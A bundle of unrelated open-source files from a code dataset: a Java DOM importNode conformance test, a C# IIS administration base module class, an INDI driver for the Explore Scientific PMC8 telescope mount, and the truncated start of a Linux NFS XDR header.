href="http://www.w3.org/TR/DOM-Level-2-Core/core#Core-Document-importNode">http://www.w3.org/TR/DOM-Level-2-Core/core#Core-Document-importNode</a> * @see <a href="http://www.w3.org/TR/DOM-Level-2-Core/core#xpointer(id('Core-Document-importNode')/raises/exception[@name='DOMException']/descr/p[substring-before(.,':')='NOT_SUPPORTED_ERR'])">http://www.w3.org/TR/DOM-Level-2-Core/core#xpointer(id('Core-Document-importNode')/raises/exception[@name='DOMException']/descr/p[substring-before(.,':')='NOT_SUPPORTED_ERR'])</a> */ public final class importNode16 extends DOMTestCase { /** * Constructor. * @param factory document factory, may not be null * @throws org.w3c.domts.DOMTestIncompatibleException Thrown if test is not compatible with parser configuration */ public importNode16(final DOMTestDocumentBuilderFactory factory) throws org.w3c.domts.DOMTestIncompatibleException { super(factory); // // check if loaded documents are supported for content type // String contentType = getContentType(); preload(contentType, "staffNS", true); preload(contentType, "staffNS", true); } /** * Runs the test case. * @throws Throwable Any uncaught exception causes test to fail */ public void runTest() throws Throwable { Document doc; Document anotherDoc; DocumentType docType; Node node; doc = (Document) load("staffNS", true); anotherDoc = (Document) load("staffNS", true); docType = anotherDoc.getDoctype(); { boolean success = false; try { node = doc.importNode(docType, false); } catch (DOMException ex) { success = (ex.code == DOMException.NOT_SUPPORTED_ERR); } assertTrue("throw_NOT_SUPPORTED_ERR", success); } } /** * Gets URI that identifies the test. * @return uri identifier of test */ public String getTargetURI() { return "http://www.w3.org/2001/DOM-Test-Suite/level2/core/importNode16"; } /** * Runs this test from the command line. * @param args command line arguments */ public static void main(final String[] args) { DOMTestCase.doMain(importNode16.class, args); } }
{ "pile_set_name": "Github" }
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT license. See LICENSE file in the project root for full license information.


namespace Microsoft.IIS.Administration.Core
{
    using System.Diagnostics;
    using System.Reflection;

    public abstract class BaseModule : IModule
    {
        private string _version;

        public abstract void Start();

        public virtual void Stop() { }

        public virtual string Version
        {
            get
            {
                if (this._version == null)
                {
                    this._version = FileVersionInfo.GetVersionInfo(this.GetType().GetTypeInfo().Assembly.Location).ProductVersion;
                }
                return this._version;
            }
            set
            {
                this._version = value;
            }
        }
    }
}
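// Illustrative example (not part of the original file): a minimal concrete
// module. The namespace and the work done in Start() are hypothetical; only
// the abstract Start() must be overridden, while Stop() and Version fall
// back to the BaseModule defaults above (Version lazily reads the assembly's
// ProductVersion on first access).
namespace Microsoft.IIS.Administration.Core.Examples
{
    public class ExampleModule : BaseModule
    {
        public override void Start()
        {
            // Hypothetical startup work: register routes, wire up services, etc.
        }
    }
}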
{ "pile_set_name": "Github" }
/* INDI Explore Scientific PMC8 driver Copyright (C) 2017 Michael Fulbright Additional contributors: Thomas Olson, Copyright (C) 2019 Karl Rees, Copyright (C) 2019 Based on IEQPro driver. This library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA */ /* Experimental Mount selector switch G11 vs EXOS2 by Thomas Olson * */ #include "pmc8.h" #include <indicom.h> #include <connectionplugins/connectionserial.h> #include <connectionplugins/connectiontcp.h> #include <libnova/sidereal_time.h> #include <memory> #include <math.h> #include <string.h> /* Simulation Parameters */ #define SLEWRATE 3 /* slew rate, degrees/s */ #define MOUNTINFO_TAB "Mount Info" #define PMC8_DEFAULT_PORT 54372 #define PMC8_DEFAULT_IP_ADDRESS "192.168.47.1" static std::unique_ptr<PMC8> scope(new PMC8()); void ISGetProperties(const char *dev) { scope->ISGetProperties(dev); } void ISNewSwitch(const char *dev, const char *name, ISState *states, char *names[], int num) { scope->ISNewSwitch(dev, name, states, names, num); } void ISNewText(const char *dev, const char *name, char *texts[], char *names[], int num) { scope->ISNewText(dev, name, texts, names, num); } void ISNewNumber(const char *dev, const char *name, double values[], char *names[], int num) { scope->ISNewNumber(dev, name, values, names, num); } void ISNewBLOB(const char *dev, const char *name, int sizes[], int blobsizes[], char *blobs[], char *formats[], char *names[], int n) { INDI_UNUSED(dev); INDI_UNUSED(name); INDI_UNUSED(sizes); INDI_UNUSED(blobsizes); INDI_UNUSED(blobs); INDI_UNUSED(formats); INDI_UNUSED(names); INDI_UNUSED(n); } void ISSnoopDevice(XMLEle *root) { scope->ISSnoopDevice(root); } /* Constructor */ PMC8::PMC8() { currentRA = ln_get_apparent_sidereal_time(ln_get_julian_from_sys()); currentDEC = 90; DBG_SCOPE = INDI::Logger::getInstance().addDebugLevel("Scope Verbose", "SCOPE"); SetTelescopeCapability(TELESCOPE_CAN_PARK | TELESCOPE_CAN_SYNC | TELESCOPE_CAN_GOTO | TELESCOPE_CAN_ABORT | TELESCOPE_HAS_TRACK_MODE | TELESCOPE_CAN_CONTROL_TRACK | TELESCOPE_HAS_TRACK_RATE | TELESCOPE_HAS_LOCATION, 4); setVersion(0, 3); } PMC8::~PMC8() { } const char *PMC8::getDefaultName() { return "PMC8"; } bool PMC8::initProperties() { INDI::Telescope::initProperties(); // My understanding is that all mounts communicate at 115200, so set this early and make it easier for newbies? 
serialConnection->setDefaultBaudRate(Connection::Serial::B_115200); //TO DO: Figure out how to set default Ethernet address and port (without overriding user config) tcpConnection->setDefaultHost(PMC8_DEFAULT_IP_ADDRESS); tcpConnection->setDefaultPort(PMC8_DEFAULT_PORT); // Mount Type IUFillSwitch(&MountTypeS[MOUNT_G11], "MOUNT_G11", "G11", ISS_OFF); IUFillSwitch(&MountTypeS[MOUNT_EXOS2], "MOUNT_EXOS2", "EXOS2", ISS_OFF); IUFillSwitch(&MountTypeS[MOUNT_iEXOS100], "MOUNT_iEXOS100", "iEXOS100", ISS_OFF); IUFillSwitchVector(&MountTypeSP, MountTypeS, 3, getDeviceName(), "MOUNT_TYPE", "Mount Type", CONNECTION_TAB, IP_RW, ISR_1OFMANY, 0, IPS_IDLE); // No need to guess mount type from device name here, can wait until after we get firmware /*if (strstr(getDeviceName(), "EXOS2")) MountTypeS[MOUNT_EXOS2].s = ISS_ON; else if (strstr(getDeviceName(), "iEXOS100")) MountTypeS[MOUNT_iEXOS100].s = ISS_ON; else MountTypeS[MOUNT_G11].s = ISS_ON;*/ /* Tracking Mode */ AddTrackMode("TRACK_SIDEREAL", "Sidereal", true); AddTrackMode("TRACK_SOLAR", "Solar"); AddTrackMode("TRACK_LUNAR", "Lunar"); AddTrackMode("TRACK_CUSTOM", "Custom"); // Set TrackRate limits within +/- 0.0100 of Sidereal rate // TrackRateN[AXIS_RA].min = TRACKRATE_SIDEREAL - 0.01; // TrackRateN[AXIS_RA].max = TRACKRATE_SIDEREAL + 0.01; // TrackRateN[AXIS_DE].min = -0.01; // TrackRateN[AXIS_DE].max = 0.01; // relabel move speeds strcpy(SlewRateSP.sp[0].label, "4x"); strcpy(SlewRateSP.sp[1].label, "16x"); strcpy(SlewRateSP.sp[2].label, "64x"); strcpy(SlewRateSP.sp[3].label, "256x"); /* How fast do we guide compared to sidereal rate */ IUFillNumber(&GuideRateN[0], "GUIDE_RATE", "x Sidereal", "%g", 0.1, 1.0, 0.1, 0.5); IUFillNumberVector(&GuideRateNP, GuideRateN, 1, getDeviceName(), "GUIDE_RATE", "Guiding Rate", MOTION_TAB, IP_RW, 0, IPS_IDLE); initGuiderProperties(getDeviceName(), MOTION_TAB); TrackState = SCOPE_IDLE; // Driver does not support custom parking yet. SetParkDataType(PARK_NONE); addAuxControls(); set_pmc8_device(getDeviceName()); IUFillText(&FirmwareT[0], "Version", "Version", ""); IUFillTextVector(&FirmwareTP, FirmwareT, 1, getDeviceName(), "Firmware", "Firmware", MAIN_CONTROL_TAB, IP_RO, 0, IPS_IDLE); setDriverInterface(getDriverInterface() | GUIDER_INTERFACE); return true; } bool PMC8::updateProperties() { INDI::Telescope::updateProperties(); if (isConnected()) { defineNumber(&GuideNSNP); defineNumber(&GuideWENP); defineNumber(&GuideRateNP); defineText(&FirmwareTP); // do not support park position deleteProperty(ParkPositionNP.name); deleteProperty(ParkOptionSP.name); getStartupData(); } else { deleteProperty(GuideNSNP.name); deleteProperty(GuideWENP.name); deleteProperty(GuideRateNP.name); deleteProperty(FirmwareTP.name); } return true; } void PMC8::getStartupData() { LOG_DEBUG("Getting firmware data..."); if (get_pmc8_firmware(PortFD, &firmwareInfo)) { const char *c; // FIXME - Need to add code to get firmware data FirmwareTP.s = IPS_OK; c = firmwareInfo.MainBoardFirmware.c_str(); LOGF_INFO("firmware = %s.", c); // not sure if there's really a point to the mount switch anymore if we know the mount from the firmware - perhaps remove as newer firmware becomes standard? 
// populate mount type switch in interface from firmware if possible if (firmwareInfo.MountType == MOUNT_EXOS2) { MountTypeS[MOUNT_EXOS2].s = ISS_ON; LOG_INFO("Detected mount type as Exos2."); } else if (firmwareInfo.MountType == MOUNT_G11) { MountTypeS[MOUNT_G11].s = ISS_ON; LOG_INFO("Detected mount type as G11."); } else if (firmwareInfo.MountType == MOUNT_iEXOS100) { MountTypeS[MOUNT_iEXOS100].s = ISS_ON; LOG_INFO("Detected mount type as iExos100."); } else { LOG_INFO("Cannot detect mount type--perhaps this is older firmware?"); if (strstr(getDeviceName(), "EXOS2")) { MountTypeS[MOUNT_EXOS2].s = ISS_ON; LOG_INFO("Guessing mount is EXOS2 from device name."); } else if (strstr(getDeviceName(), "iEXOS100")) { MountTypeS[MOUNT_iEXOS100].s = ISS_ON; LOG_INFO("Guessing mount is iEXOS100 from device name."); } else { MountTypeS[MOUNT_G11].s = ISS_ON; LOG_INFO("Guessing mount is G11."); } } MountTypeSP.s = IPS_OK; IDSetSwitch(&MountTypeSP,nullptr); IUSaveText(&FirmwareT[0], c); IDSetText(&FirmwareTP, nullptr); } // PMC8 doesn't store location permanently so read from config and set // Convert to INDI standard longitude (0 to 360 Eastward) double longitude = LocationN[LOCATION_LONGITUDE].value; double latitude = LocationN[LOCATION_LATITUDE].value; // must also keep "low level" aware of position to convert motor counts to RA/DEC set_pmc8_location(latitude, longitude); // seems like best place to put a warning that will be seen in log window of EKOS/etc LOG_INFO("The PMC-Eight driver is in BETA development currently."); LOG_INFO("Be prepared to intervene if something unexpected occurs."); #if 0 // FIXEME - Need to handle southern hemisphere for DEC? double HA = ln_get_apparent_sidereal_time(ln_get_julian_from_sys()); double DEC = 90; // currently only park at motor position (0, 0) if (InitPark()) { // If loading parking data is successful, we just set the default parking values. SetAxis1ParkDefault(HA); SetAxis2ParkDefault(DEC); } else { // Otherwise, we set all parking data to default in case no parking data is found. 
SetAxis1Park(HA); SetAxis2Park(DEC); SetAxis1ParkDefault(HA); SetAxis2ParkDefault(DEC); } #endif #if 0 // FIXME - Need to implement simulation functionality if (isSimulation()) { if (isParked()) set_sim_system_status(ST_PARKED); else set_sim_system_status(ST_STOPPED); } #endif } bool PMC8::ISNewNumber(const char *dev, const char *name, double values[], char *names[], int n) { if (!strcmp(dev, getDeviceName())) { // FIXME - will add setting guide rate when firmware supports // Guiding Rate if (!strcmp(name, GuideRateNP.name)) { IUUpdateNumber(&GuideRateNP, values, names, n); if (set_pmc8_guide_rate(PortFD, GuideRateN[0].value)) GuideRateNP.s = IPS_OK; else GuideRateNP.s = IPS_ALERT; IDSetNumber(&GuideRateNP, nullptr); return true; } if (!strcmp(name, GuideNSNP.name) || !strcmp(name, GuideWENP.name)) { processGuiderProperties(name, values, names, n); return true; } } return INDI::Telescope::ISNewNumber(dev, name, values, names, n); } void PMC8::ISGetProperties(const char *dev) { INDI::Telescope::ISGetProperties(dev); defineSwitch(&MountTypeSP); } bool PMC8::ISNewSwitch(const char *dev, const char *name, ISState *states, char *names[], int n) { if (dev != nullptr && strcmp(dev, getDeviceName()) == 0) { if (strcmp(name, MountTypeSP.name) == 0) { IUUpdateSwitch(&MountTypeSP, states, names, n); int currentMountIndex = IUFindOnSwitchIndex(&MountTypeSP); LOGF_INFO("Selected mount is %s", MountTypeS[currentMountIndex].label); // Set iEXOS100 baud rate to 115200 // Not sure why we were only doing this for iEXOS100? It's the same for everybody, right? // So I moved this to initProperties() //if (!isConnected()) && currentMountIndex == MOUNT_iEXOS100) // serialConnection->setDefaultBaudRate(Connection::Serial::B_115200); //right now, this lets the user override the parameters for the detected mount. Perhaps we should prevent the user from doing so? set_pmc8_mountParameters(currentMountIndex); MountTypeSP.s = IPS_OK; IDSetSwitch(&MountTypeSP, nullptr); // defineSwitch(&MountTypeSP); return true; } } return INDI::Telescope::ISNewSwitch(dev, name, states, names, n); } bool PMC8::ReadScopeStatus() { bool rc = false; if (isSimulation()) mountSim(); bool slewing = false; switch (TrackState) { case SCOPE_SLEWING: // are we done? // check slew state rc = get_pmc8_is_scope_slewing(PortFD, slewing); if (!rc) { LOG_ERROR("PMC8::ReadScopeStatus() - unable to check slew state"); } else { if (slewing == false) { LOG_INFO("Slew complete, tracking..."); TrackState = SCOPE_TRACKING; if (!SetTrackEnabled(true)) { LOG_ERROR("slew complete - unable to enable tracking"); return false; } if (!SetTrackMode(IUFindOnSwitchIndex(&TrackModeSP))) { LOG_ERROR("slew complete - unable to set track mode"); return false; } } } break; case SCOPE_PARKING: // are we done? // are we done? 
// check slew state rc = get_pmc8_is_scope_slewing(PortFD, slewing); if (!rc) { LOG_ERROR("PMC8::ReadScopeStatus() - unable to check slew state"); } else { if (slewing == false) { if (stop_pmc8_tracking_motion(PortFD)) LOG_DEBUG("Mount tracking is off."); SetParked(true); saveConfig(true); } } break; default: break; } rc = get_pmc8_coords(PortFD, currentRA, currentDEC); if (rc) NewRaDec(currentRA, currentDEC); return rc; } bool PMC8::Goto(double r, double d) { char RAStr[64] = {0}, DecStr[64] = {0}; targetRA = r; targetDEC = d; fs_sexa(RAStr, targetRA, 2, 3600); fs_sexa(DecStr, targetDEC, 2, 3600); DEBUGF(INDI::Logger::DBG_SESSION, "Slewing to RA: %s - DEC: %s", RAStr, DecStr); if (slew_pmc8(PortFD, r, d) == false) { LOG_ERROR("Failed to slew."); return false; } TrackState = SCOPE_SLEWING; return true; } bool PMC8::Sync(double ra, double dec) { targetRA = ra; targetDEC = dec; char RAStr[64] = {0}, DecStr[64] = {0}; fs_sexa(RAStr, targetRA, 2, 3600); fs_sexa(DecStr, targetDEC, 2, 3600); DEBUGF(INDI::Logger::DBG_SESSION, "Syncing to RA: %s - DEC: %s", RAStr, DecStr); if (sync_pmc8(PortFD, ra, dec) == false) { LOG_ERROR("Failed to sync."); } EqNP.s = IPS_OK; currentRA = ra; currentDEC = dec; NewRaDec(currentRA, currentDEC); return true; } bool PMC8::Abort() { //GUIDE Abort guide operations. if (GuideNSNP.s == IPS_BUSY || GuideWENP.s == IPS_BUSY) { GuideNSNP.s = GuideWENP.s = IPS_IDLE; GuideNSN[0].value = GuideNSN[1].value = 0.0; GuideWEN[0].value = GuideWEN[1].value = 0.0; if (GuideNSTID) { IERmTimer(GuideNSTID); GuideNSTID = 0; } if (GuideWETID) { IERmTimer(GuideWETID); GuideNSTID = 0; } LOG_INFO("Guide aborted."); IDSetNumber(&GuideNSNP, nullptr); IDSetNumber(&GuideWENP, nullptr); return true; } return abort_pmc8(PortFD); } bool PMC8::Park() { #if 0 // FIXME - Currently only support parking at motor position (0, 0) targetRA = GetAxis1Park(); targetDEC = GetAxis2Park(); if (set_pmc8_radec(PortFD, r, d) == false) { LOG_ERROR("Error setting RA/DEC."); return false; } #endif if (park_pmc8(PortFD)) { TrackState = SCOPE_PARKING; LOG_INFO("Telescope parking in progress to motor position (0, 0)"); return true; } else { return false; } } bool PMC8::UnPark() { if (unpark_pmc8(PortFD)) { SetParked(false); TrackState = SCOPE_IDLE; return true; } else { return false; } } bool PMC8::Handshake() { if (isSimulation()) { set_pmc8_sim_system_status(ST_STOPPED); set_pmc8_sim_track_rate(PMC8_TRACK_SIDEREAL); set_pmc8_sim_move_rate(PMC8_MOVE_64X); // set_pmc8_sim_hemisphere(HEMI_NORTH); } if (check_pmc8_connection(PortFD) == false) return false; return true; } bool PMC8::updateTime(ln_date *utc, double utc_offset) { // mark unused INDI_UNUSED(utc); INDI_UNUSED(utc_offset); LOG_ERROR("PMC8::updateTime() not implemented!"); return false; } bool PMC8::updateLocation(double latitude, double longitude, double elevation) { INDI_UNUSED(elevation); if (longitude > 180) longitude -= 360; // do not support Southern Hemisphere yet! 
if (latitude < 0) { LOG_ERROR("Southern Hemisphere not currently supported!"); return false; } // must also keep "low level" aware of position to convert motor counts to RA/DEC set_pmc8_location(latitude, longitude); char l[32] = {0}, L[32] = {0}; fs_sexa(l, latitude, 3, 3600); fs_sexa(L, longitude, 4, 3600); LOGF_INFO("Site location updated to Lat %.32s - Long %.32s", l, L); return true; } void PMC8::debugTriggered(bool enable) { set_pmc8_debug(enable); } void PMC8::simulationTriggered(bool enable) { set_pmc8_simulation(enable); } bool PMC8::MoveNS(INDI_DIR_NS dir, TelescopeMotionCommand command) { if (TrackState == SCOPE_PARKED) { LOG_ERROR("Please unpark the mount before issuing any motion commands."); return false; } // read desired move rate int currentIndex = IUFindOnSwitchIndex(&SlewRateSP); LOGF_DEBUG("MoveNS at slew index %d", currentIndex); switch (command) { case MOTION_START: if (start_pmc8_motion(PortFD, (dir == DIRECTION_NORTH ? PMC8_N : PMC8_S), currentIndex) == false) { LOG_ERROR("Error setting N/S motion direction."); return false; } else { LOGF_INFO("Moving toward %s.", (dir == DIRECTION_NORTH) ? "North" : "South"); } break; case MOTION_STOP: if (stop_pmc8_motion(PortFD, (dir == DIRECTION_NORTH ? PMC8_N : PMC8_S)) == false) { LOG_ERROR("Error stopping N/S motion."); return false; } else { LOGF_INFO("%s motion stopped.", (dir == DIRECTION_NORTH) ? "North" : "South"); } break; } return true; } bool PMC8::MoveWE(INDI_DIR_WE dir, TelescopeMotionCommand command) { if (TrackState == SCOPE_PARKED) { LOG_ERROR("Please unpark the mount before issuing any motion commands."); return false; } // read desired move rate int currentIndex = IUFindOnSwitchIndex(&SlewRateSP); LOGF_DEBUG("MoveWE at slew index %d", currentIndex); switch (command) { case MOTION_START: if (start_pmc8_motion(PortFD, (dir == DIRECTION_WEST ? PMC8_W : PMC8_E), currentIndex) == false) { LOG_ERROR("Error setting W/E motion direction."); return false; } else { LOGF_INFO("Moving toward %s.", (dir == DIRECTION_WEST) ? "West" : "East"); } break; case MOTION_STOP: if (stop_pmc8_motion(PortFD, (dir == DIRECTION_WEST ? PMC8_W : PMC8_E)) == false) { LOG_ERROR("Error stopping W/E motion."); return false; } else { LOGF_INFO("%s motion stopped.", (dir == DIRECTION_WEST) ? "West" : "East"); // restore tracking if (TrackState == SCOPE_TRACKING) { LOG_INFO("Move E/W complete, tracking..."); if (!SetTrackEnabled(true)) { LOG_ERROR("slew complete - unable to enable tracking"); return false; } if (!SetTrackMode(IUFindOnSwitchIndex(&TrackModeSP))) { LOG_ERROR("slew complete - unable to set track mode"); return false; } } } break; } return true; } IPState PMC8::GuideNorth(uint32_t ms) { long timetaken_us; int timeremain_ms; // If already moving, then stop movement if (MovementNSSP.s == IPS_BUSY) { int dir = IUFindOnSwitchIndex(&MovementNSSP); MoveNS(dir == 0 ? DIRECTION_NORTH : DIRECTION_SOUTH, MOTION_STOP); } if (GuideNSTID) { IERmTimer(GuideNSTID); GuideNSTID = 0; } start_pmc8_guide(PortFD, PMC8_N, (int)ms, timetaken_us); timeremain_ms = (int)(ms - ((float)timetaken_us) / 1000.0); if (timeremain_ms < 0) timeremain_ms = 0; GuideNSTID = IEAddTimer(timeremain_ms, guideTimeoutHelperN, this); return IPS_BUSY; } IPState PMC8::GuideSouth(uint32_t ms) { long timetaken_us; int timeremain_ms; // If already moving, then stop movement if (MovementNSSP.s == IPS_BUSY) { int dir = IUFindOnSwitchIndex(&MovementNSSP); MoveNS(dir == 0 ?
DIRECTION_NORTH : DIRECTION_SOUTH, MOTION_STOP); } if (GuideNSTID) { IERmTimer(GuideNSTID); GuideNSTID = 0; } start_pmc8_guide(PortFD, PMC8_S, (int)ms, timetaken_us); timeremain_ms = (int)(ms - ((float)timetaken_us) / 1000.0); if (timeremain_ms < 0) timeremain_ms = 0; GuideNSTID = IEAddTimer(timeremain_ms, guideTimeoutHelperS, this); return IPS_BUSY; } IPState PMC8::GuideEast(uint32_t ms) { long timetaken_us; int timeremain_ms; // If already moving (no pulse command), then stop movement if (MovementWESP.s == IPS_BUSY) { int dir = IUFindOnSwitchIndex(&MovementWESP); MoveWE(dir == 0 ? DIRECTION_WEST : DIRECTION_EAST, MOTION_STOP); } if (GuideWETID) { IERmTimer(GuideWETID); GuideWETID = 0; } start_pmc8_guide(PortFD, PMC8_E, (int)ms, timetaken_us); timeremain_ms = (int)(ms - ((float)timetaken_us) / 1000.0); if (timeremain_ms < 0) timeremain_ms = 0; GuideWETID = IEAddTimer(timeremain_ms, guideTimeoutHelperE, this); return IPS_BUSY; } IPState PMC8::GuideWest(uint32_t ms) { long timetaken_us; int timeremain_ms; // If already moving (no pulse command), then stop movement if (MovementWESP.s == IPS_BUSY) { int dir = IUFindOnSwitchIndex(&MovementWESP); MoveWE(dir == 0 ? DIRECTION_WEST : DIRECTION_EAST, MOTION_STOP); } if (GuideWETID) { IERmTimer(GuideWETID); GuideWETID = 0; } start_pmc8_guide(PortFD, PMC8_W, (int)ms, timetaken_us); timeremain_ms = (int)(ms - ((float)timetaken_us) / 1000.0); if (timeremain_ms < 0) timeremain_ms = 0; GuideWETID = IEAddTimer(timeremain_ms, guideTimeoutHelperW, this); return IPS_BUSY; } void PMC8::guideTimeout(PMC8_DIRECTION calldir) { // end previous pulse command stop_pmc8_guide(PortFD, calldir); if (calldir == PMC8_N || calldir == PMC8_S) { GuideNSNP.np[0].value = 0; GuideNSNP.np[1].value = 0; GuideNSNP.s = IPS_IDLE; GuideNSTID = 0; IDSetNumber(&GuideNSNP, nullptr); } if (calldir == PMC8_W || calldir == PMC8_E) { GuideWENP.np[0].value = 0; GuideWENP.np[1].value = 0; GuideWENP.s = IPS_IDLE; GuideWETID = 0; IDSetNumber(&GuideWENP, nullptr); } LOG_DEBUG("GUIDE CMD COMPLETED"); } //GUIDE The timer helper functions. void PMC8::guideTimeoutHelperN(void *p) { static_cast<PMC8*>(p)->guideTimeout(PMC8_N); } void PMC8::guideTimeoutHelperS(void *p) { static_cast<PMC8*>(p)->guideTimeout(PMC8_S); } void PMC8::guideTimeoutHelperW(void *p) { static_cast<PMC8*>(p)->guideTimeout(PMC8_W); } void PMC8::guideTimeoutHelperE(void *p) { static_cast<PMC8*>(p)->guideTimeout(PMC8_E); } bool PMC8::SetSlewRate(int index) { INDI_UNUSED(index); // slew rate is rate for MoveEW/MOVENE commands - not for GOTOs!!! // just return true - we will check SlewRateSP when we do actually moves return true; } bool PMC8::saveConfigItems(FILE *fp) { INDI::Telescope::saveConfigItems(fp); IUSaveConfigSwitch(fp, &MountTypeSP); return true; } void PMC8::mountSim() { static struct timeval ltv; struct timeval tv; double dt, da, dx; int nlocked; /* update elapsed time since last poll, don't presume exactly POLLMS */ gettimeofday(&tv, nullptr); if (ltv.tv_sec == 0 && ltv.tv_usec == 0) ltv = tv; dt = tv.tv_sec - ltv.tv_sec + (tv.tv_usec - ltv.tv_usec) / 1e6; ltv = tv; da = SLEWRATE * dt; /* Process per current state. 
We check the state of EQUATORIAL_COORDS and act accordingly */ switch (TrackState) { case SCOPE_IDLE: currentRA += (TrackRateN[AXIS_RA].value / 3600.0 * dt) / 15.0; currentRA = range24(currentRA); break; case SCOPE_TRACKING: if (TrackModeS[1].s == ISS_ON) { currentRA += ( ((TRACKRATE_SIDEREAL / 3600.0) - (TrackRateN[AXIS_RA].value / 3600.0)) * dt) / 15.0; currentDEC += ( (TrackRateN[AXIS_DE].value / 3600.0) * dt); } break; case SCOPE_SLEWING: case SCOPE_PARKING: /* slewing - nail it when both within one pulse @ SLEWRATE */ nlocked = 0; dx = targetRA - currentRA; // Take shortest path if (fabs(dx) > 12) dx *= -1; if (fabs(dx) <= da) { currentRA = targetRA; nlocked++; } else if (dx > 0) currentRA += da / 15.; else currentRA -= da / 15.; if (currentRA < 0) currentRA += 24; else if (currentRA > 24) currentRA -= 24; dx = targetDEC - currentDEC; if (fabs(dx) <= da) { currentDEC = targetDEC; nlocked++; } else if (dx > 0) currentDEC += da; else currentDEC -= da; if (nlocked == 2) { if (TrackState == SCOPE_SLEWING) set_pmc8_sim_system_status(ST_TRACKING); else set_pmc8_sim_system_status(ST_PARKED); } break; case SCOPE_PARKED: // setting system status to parked will automatically // set the simulated RA/DEC to park position so reread set_pmc8_sim_system_status(ST_PARKED); get_pmc8_coords(PortFD, currentRA, currentDEC); break; default: break; } set_pmc8_sim_ra(currentRA); set_pmc8_sim_dec(currentDEC); } #if 0 // PMC8 only parks to motor position (0, 0) currently bool PMC8::SetCurrentPark() { SetAxis1Park(currentRA); SetAxis2Park(currentDEC); return true; } bool PMC8::SetDefaultPark() { // By default set RA to HA SetAxis1Park(ln_get_apparent_sidereal_time(ln_get_julian_from_sys())); // Set DEC to 90 or -90 depending on the hemisphere // SetAxis2Park((HemisphereS[HEMI_NORTH].s == ISS_ON) ? 90 : -90); SetAxis2Park(90); return true; } #else bool PMC8::SetCurrentPark() { LOG_ERROR("PMC8::SetCurrentPark() not implemented!"); return false; } bool PMC8::SetDefaultPark() { LOG_ERROR("PMC8::SetDefaultPark() not implemented!"); return false; } #endif bool PMC8::SetTrackMode(uint8_t mode) { uint32_t pmc8_mode; LOGF_DEBUG("PMC8::SetTrackMode called mode=%d", mode); // FIXME - Need to make sure track modes are handled properly!
//PMC8_TRACK_RATE rate = static_cast<PMC8_TRACK_RATE>(mode); switch (mode) { case TRACK_SIDEREAL: pmc8_mode = PMC8_TRACK_SIDEREAL; break; case TRACK_LUNAR: pmc8_mode = PMC8_TRACK_LUNAR; break; case TRACK_SOLAR: pmc8_mode = PMC8_TRACK_SOLAR; break; case TRACK_CUSTOM: pmc8_mode = PMC8_TRACK_CUSTOM; break; default: LOGF_ERROR("PMC8::SetTrackMode mode=%d not supported!", mode); return false; } if (pmc8_mode == PMC8_TRACK_CUSTOM) { if (set_pmc8_custom_ra_track_rate(PortFD, TrackRateN[AXIS_RA].value)) return true; } else { if (set_pmc8_track_mode(PortFD, mode)) return true; } return false; } bool PMC8::SetTrackRate(double raRate, double deRate) { static bool deRateWarning = true; double pmc8RARate; LOGF_DEBUG("PMC8::SetTrackRate called raRate=%f deRate=%f", raRate, deRate); // Convert to arcsecs/s to +/- 0.0100 accepted by the controller //double pmc8RARate = raRate - TRACKRATE_SIDEREAL; // for now just send rate pmc8RARate = raRate; if (deRate != 0 && deRateWarning) { // Only send warning once per session deRateWarning = false; LOG_WARN("Custom Declination tracking rate is not implemented yet."); } if (set_pmc8_custom_ra_track_rate(PortFD, pmc8RARate)) return true; LOG_ERROR("PMC8::SetTrackRate not implemented!"); return false; } bool PMC8::SetTrackEnabled(bool enabled) { LOGF_DEBUG("PMC8::SetTrackEnabled called enabled=%d", enabled); // need to determine current tracking mode and start tracking if (enabled) { if (!SetTrackMode(IUFindOnSwitchIndex(&TrackModeSP))) { LOG_ERROR("PMC8::SetTrackEnabled - unable to enable tracking"); return false; } } else { bool rc; rc = set_pmc8_custom_ra_track_rate(PortFD, 0); if (!rc) { LOG_ERROR("PMC8::SetTrackEnabled - unable to set RA track rate to 0"); return false; } // currently only support tracking rate in RA // rc=set_pmc8_custom_dec_track_rate(PortFD, 0); // if (!rc) // { // LOG_ERROR("PMC8::SetTrackEnabled - unable to set DEC track rate to 0"); // return false; // } } return true; }
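// Worked example of the guide-pulse bookkeeping in GuideNorth/South/East/West
// above (illustrative numbers only): start_pmc8_guide() reports the time the
// blocking command itself consumed via timetaken_us, and the completion timer
// is armed only for the remainder of the requested pulse. For a 500 ms pulse
// where the command took 12000 us:
//
//     timeremain_ms = (int)(500 - 12000 / 1000.0) = 488
//
// so the guideTimeout() callback fires ~488 ms later and the total pulse
// still comes out at roughly the requested 500 ms.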
{ "pile_set_name": "Github" }
/**************************************************************************** **************************************************************************** *** *** This header was automatically generated from a Linux kernel header *** of the same name, to make information necessary for userspace to *** call into the kernel available to libc. It contains only constants, *** structures, and macros generated from the original header, and thus, *** contains no copyrightable information. *** **************************************************************************** ****************************************************************************/ #ifndef _LINUX_NFS_XDR_H #define _LINUX_NFS_XDR_H #include <linux/sunrpc/xprt.h> #include <linux/nfsacl.h> #define NFS_MAX_FILE_IO_SIZE (1048576U) #define NFS_DEF_FILE_IO_SIZE (4096U) #define NFS_MIN_FILE_IO_SIZE (1024U) struct nfs_fsid { uint64_t major; uint64_t minor; }; #define NFS_ATTR_WCC 0x0001 #define NFS_ATTR_FATTR 0x0002 #define NFS_ATTR_FATTR_V3 0x0004 #define NFS_ATTR_FATTR_V4 0x0008 #define NFS_ATTR_FATTR_V4_REFERRAL 0x0010 struct nfs_fsinfo { struct nfs_fattr *fattr; __u32 rtmax; __u32 rtpref; __u32 rtmult; __u32 wtmax; __u32 wtpref; __u32 wtmult; __u32 dtpref; __u64 maxfilesize; __u32 lease_time; }; struct nfs_fsstat { struct nfs_fattr *fattr; __u64 tbytes; __u64 fbytes; __u64 abytes; __u64 tfiles; __u64 ffiles; __u64 afiles; }; struct nfs2_fsstat { __u32 tsize; __u32 bsize; __u32 blocks; __u32 bfree; __u32 bavail; }; struct nfs_pathconf { struct nfs_fattr *fattr; __u32 max_link; __u32 max_namelen; }; struct nfs4_change_info { u32 atomic; u64 before; u64 after; }; struct nfs_seqid; struct nfs_openargs { const struct nfs_fh * 